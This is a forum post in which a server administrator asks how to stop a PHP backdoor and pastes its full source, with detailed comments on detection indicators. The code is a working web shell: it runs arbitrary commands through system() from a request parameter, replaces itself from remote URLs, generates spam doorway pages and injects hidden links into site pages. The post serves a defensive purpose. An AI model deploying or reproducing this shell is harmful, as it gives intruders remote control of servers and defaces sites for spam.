stop specific PHP code from executing?


Recently a server I manage has been hit with some sort of PHP hack. A PHP file with a randomly generated file name is being uploaded into a directory with a randomly generated name. From what I can tell, the attacker calls the PHP script through a browser and uses it to inject spam links and JavaScript exploits into index files. I removed all affected files as well as the source PHP files that were uploaded.

What I want is to be able to check for this in the future. It would be great if I could somehow kill any PHP script that tries to execute this particular code. Is there any way this can be done? Would mod_security work? The server is a typical LAMP configuration.

Here is the code in question; any suggestions on how I could prevent it from being executed in the future would be appreciated:

Code:
<?php
// Keep running after the requesting client disconnects, and with no
// execution time limit, so the long file-generation loops below finish
// even if the operator closes the browser.
ignore_user_abort(1);
set_time_limit(0);

// Cleanup / anti-forensics: deletes the shell's local state files from the
// current directory. "c" (progress state) and "1r" (list of generated index
// pages) are written by Gen() in this file; nothing visible here writes
// "log", so it is presumably created by another component.
// Triggered by the "cl" request parameter (see Main()).
function Clear()
{
	unlink("c");
	unlink("1r");
  unlink("log");
}

// Reverts the page injection performed by MRepl(): the name of the target
// page is read from the local file "m", the page is loaded from the parent
// directory, and everything MRepl() appends is stripped again — the
// <dd4>...<dd5> and <!--dd4-->...<!--dd5--> marker blocks, the zero-size
// hidden <font> wrapper, plus anchors containing "_lm" or "http...tmp6"
// (presumably links to the "*_lm.htm" pages Gen() creates). The cleaned page
// is written back and " upt-ok" is echoed.
// Triggered by the "cl2" request parameter (see Main()).
// NOTE(review): ereg_replace() was removed in PHP 7; this sample predates it.
function Clear2()
{
	$mrd = trim(file_get_contents("m"));
	$pt = "../$mrd";  // target page lives one directory above the shell
	$fin = file_get_contents($pt);
	$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
	$fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); 
	$fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
	$fin = ereg_replace("<!--dd4-->", "", $fin);
  $fin = ereg_replace("<!--dd5-->", "", $fin);
  // same hidden wrapper string that MRepl() uses as $begtag
  $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin);
	$fmrd = fopen($pt, "w+");
	fwrite($fmrd, $fin);
	fclose($fmrd);
	echo " upt-ok";
}

// Copies request parameter $name into $var with no validation. POST is read
// first and GET second, so a GET value overrides a POST value of the same
// name. Returns false when the resulting value is the empty string (loose
// comparison), true otherwise. Used by MRepl() for the "mpt" parameter.
function GetVar($name, &$var)
{
	$var = "";
	if (isset($_POST[$name]))
		$var = $_POST[$name];

  if (isset($_GET[$name]))
		$var = $_GET[$name];
	
	if (($var) =="")
	  return  false;
	  else return true;
}

// Doorway-page generator. State lives in the 4-line file "c" next to the
// shell (top dir name, sub dir name, current keyword, next page index).
//  - First run (no "c"): creates a random 5-letter directory drawn from $alp,
//    writes into it an .htaccess fetched from "<sg>2.txt", then creates a
//    random 3-letter subdirectory.
//  - Every run: fetches ten pages from "<sg>sgen.php?g=<gm>" and stores them
//    as "<top>/<sub>/<gm>_<n>.htm", n = index..index+9.
//  - When the index reaches 100: fetches "...&m=1" into "<gm>_lm.htm", appends
//    that path to the list file "1r", and the following run starts a fresh
//    3-letter subdirectory.
// "sg" (remote base URL) and "gm" (keyword) are request parameters; GET
// overrides POST. With a URL in "sg" every fopen() here is a remote fetch and
// relies on allow_url_fopen being enabled. Triggered by the "g" request
// parameter (see Main()), which is a different name from the "gm" it reads.
// Detection notes: pairs of lowercase 5-letter/3-letter directories holding
// "*_<n>.htm" files and an .htaccess, and the files "c" and "1r" beside the
// shell, are the on-disk artefacts of this function.
// NOTE(review): $maps, $rnd and $path are assigned but never used ($path is
// always "", so entries in "1r" start with "/").
function Gen()
{
	$alp = "abcdefghiklmnjsweqrtyuiopzx";  // 27 chars; mt_rand(0,26) below indexes all of them
	$maps = array();
	if (isset($_POST["sg"]))
		$sg = $_POST["sg"];

  if (isset($_GET["sg"]))
		$sg = $_GET["sg"]; 
		
	if (isset($_POST["gm"]))
 	 $g = $_POST["gm"];

	if (isset($_GET["gm"]))
		$g = $_GET["gm"];
		
		
	$path = "";
	// append-mode handle for the list of generated "_lm.htm" pages; never fclose()d
	$fr = fopen("1r", "a+");
	if (file_exists("c"))
	{
		// resume from saved state
		$fconf = file("c");
		$tname = trim($fconf[0]);
		$cname = trim($fconf[1]);
		$curs = trim($fconf[2]);
		$pid = trim($fconf[3]);
		if ($pid == 100)
		{
			// 100 pages written to this subdirectory: start a new 3-letter one
			$pid = 0;
			$rnd = mt_rand(0, 999);
			$nm = "";
	    for ($i=0; $i<3; $i++)
	  	{
		  	$ran = mt_rand(0,26);
		  	$sym = $alp[$ran];
		  	$nm = $nm.$sym;
		  }
			$cname = $nm;
			mkdir("$tname/$cname");
			$curs = $g;
		}
	}
	else 
	{
		// first run: random 5-letter top-level directory
		$rnd = mt_rand(0, 999);
		$nm = "";
	  for ($i=0; $i<5; $i++)
		{
			$ran = mt_rand(0,26);
			$sym = $alp[$ran];
			$nm = $nm.$sym;
		}
		$tname = $nm;
		$pid = 0;
		$curs = $g;
		mkdir($tname);
		// .htaccess content is downloaded from "<sg>2.txt"
		$fht = fopen("$tname/.htaccess", "w+");
		$htname = $sg."2.txt";
		$fp = fopen($htname, "r");
		$fin = '';
		while (!feof($fp))
		{
			 $fc = fgets($fp, 1024);
			 if (!$fc) break;
		   $fin .= $fc;
		}
		fclose($fp);
		fwrite($fht, $fin);
		fclose($fht);
		// random 3-letter subdirectory
		$rnd = mt_rand(0, 999);
		$nm = "";
    for ($i=0; $i<3; $i++)
  	{
	  	$ran = mt_rand(0,26);
	  	$sym = $alp[$ran];
	  	$nm = $nm.$sym;
	  }
		$cname = $nm;
	mkdir("$tname/$cname");
	}
  $gname = $sg."sgen.php";
	// ten doorway pages per invocation, indices $pid .. $pid+9
	for ($j=$pid; $j<$pid+10; $j++)
	{
		$fp = fopen($gname."?g=$curs", "r");
		$fin = '';
		while (!feof($fp))
		{
			 $fc = fgets($fp, 1024);
			 if (!$fc) break;
		   $fin .= $fc;
		}
		fclose($fp);
		
		$fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
		fwrite($fnd, $fin);
		fclose($fnd);
	}
	
	// $j is $pid+10 here, so this fires on the run that wrote pages 90..99
	if ($j==100)
	{
	  $fp = fopen($gname."?g=$curs&m=1", "r");
		$fin = '';
		while (!feof($fp))
		{
			 $fc = fgets($fp, 1024);
			 if (!$fc) break;
		   $fin .= $fc;
		}
		fclose($fp);
		$fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
		fwrite($fnd, $fin);
		fclose($fnd);
		$map = "$path/$tname/$cname/$curs"."_lm.htm";
		fwrite($fr,"$map\n");
	}
	
	// persist state for the next invocation
	$fconf = fopen("c", "w+");
	fwrite($fconf, $tname."\n");
	fwrite($fconf, $cname."\n");
	fwrite($fconf, $curs."\n");
	$nj = $j;
	fwrite($fconf, $nj."\n");
	fclose($fconf);
}

// Self-update: reads whatever location request parameter "u" names (GET
// overrides POST; fopen() accepts a local path or, with allow_url_fopen, a
// URL) and overwrites "1.php" in the current directory with it — i.e. the
// shell assumes it is installed under that name. Triggered by the "u"
// request parameter (see Main()). A 1.php whose mtime changes right after a
// request carrying "u" is the observable trace of this action.
function Update()
{
	$thisname = "1.php";
	if (isset($_POST['u']))
	  $u = $_POST['u'];
	  
	if (isset($_GET['u']))
 		$u = $_GET['u'];
 		
 	$fp = fopen($u, "r");
  $fin = '';
		while (!feof($fp))
		{
			 $fc = fgets($fp, 1024);
			 if (!$fc) break;
		   $fin .= $fc;
		}
  fclose($fp);
  
  $fthis = fopen($thisname, "w+");
  fwrite($fthis, $fin);
  fclose($fthis);
}

// Remote command execution: the raw value of request parameter "c" is handed
// to system(), whose output is written straight into the HTTP response; the
// "@" hides any PHP warning. If both POST and GET carry "c", both values run.
// Triggered by the "c" request parameter (see Main()). On the host this shows
// up as the web-server user spawning a shell as a child of the PHP process.
function Com()
{
	if (isset($_POST['c']))
	  @system($_POST['c']);
  if (isset($_GET['c']))
		@system($_GET['c']);
}

// Page injection. The target page name is read from the local file "m" and
// the page loaded from the parent directory. Any earlier injection
// (<dd4>...<dd5>, <!--dd4-->...<!--dd5-->) and the closing </body></html> are
// removed, then the content fetched from request parameter "mpt" (path or
// URL, via GetVar()) is appended inside an absolutely positioned, zero-size
// <font> element bracketed by <dd4>/<dd5> markers, </body></html> is
// re-added, and the page is written back. The markers and the exact <font>
// style string are what Clear2() searches for to undo this, and they are the
// strings to grep a web root for when checking for this infection.
// Triggered by the "s" request parameter (see Main()).
// NOTE(review): the loop exit()s on any falsy fgets() result before the page
// is rewritten, so a source that ends in a newline appears to trigger the
// usual feof()/fgets() extra-iteration and abort the injection.
function MRepl()
{
	$mpt = "";
	$drs = "";
	$begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
  $endtag = "</font></body></html><dd5> "; 
	$mrd = trim(file_get_contents("m"));
	$pt = "../$mrd";  // target page lives one directory above the shell
	$fin = file_get_contents($pt);
	GetVar("mpt", $mpt);
	 // strip the closing html tags (original comment, translated from Russian)
  $fin = preg_replace ("/<\/body>/i", "", $fin);
  $fin = preg_replace ("/<\/html>/i", "", $fin);
  // drop any block left by a previous run
  $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
  $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
	$fp = fopen($mpt, "r");
  $drs = '';
	while (!feof($fp))
	{
		 $fc = fgets($fp, 1024);
		 if (!$fc) 
		 {  
       exit();
		 }
	   $drs .= $fc;
	}
  fclose($fp);
  $fin = $fin.$begtag;  
  $fin = $fin.$drs;
  $fin = $fin.$endtag; 
  $fmrd = fopen($pt, "w+");
	fwrite($fmrd, $fin);
	fclose($fmrd);
}

// Request dispatcher. The first matching parameter wins and each branch
// exit()s, so exactly one action runs per request, checked in this order:
//   u   -> Update()  overwrite 1.php with fetched content
//   c   -> Com()     system() on the parameter value
//   g   -> Gen()     generate doorway pages (reads "sg"/"gm")
//   s   -> MRepl()   inject hidden content into the page named in "m"
//   cl  -> Clear()   delete state files c, 1r, log
//   cl2 -> Clear2()  strip the injected content again
// A request carrying none of them prints "<ok>", which serves as a liveness
// probe; a response body consisting of just "<ok>" is itself an indicator.
function Main()
{
	if (isset($_POST['u']) || isset($_GET['u']))
	{
		Update();
		exit();
	}
	
	if (isset($_POST['c']) || isset($_GET['c']))
	{
		Com();
		exit();
	}
	
	if (isset($_POST['g']) || isset($_GET['g']))
	{
		Gen();
		exit();
	}
	
	if (isset($_POST['s']) || isset($_GET['s']))
	{
		MRepl();
		exit();
	}
	
  if (isset($_POST['cl']) || isset($_GET['cl']))
	{
		Clear();
		exit();
	}
	
	if (isset($_POST['cl2']) || isset($_GET['cl2']))
	{
		Clear2();
		exit();
	}
	
	echo "<ok>";
	
}

// Entry point: every request to this file goes through the dispatcher above.
Main();

?>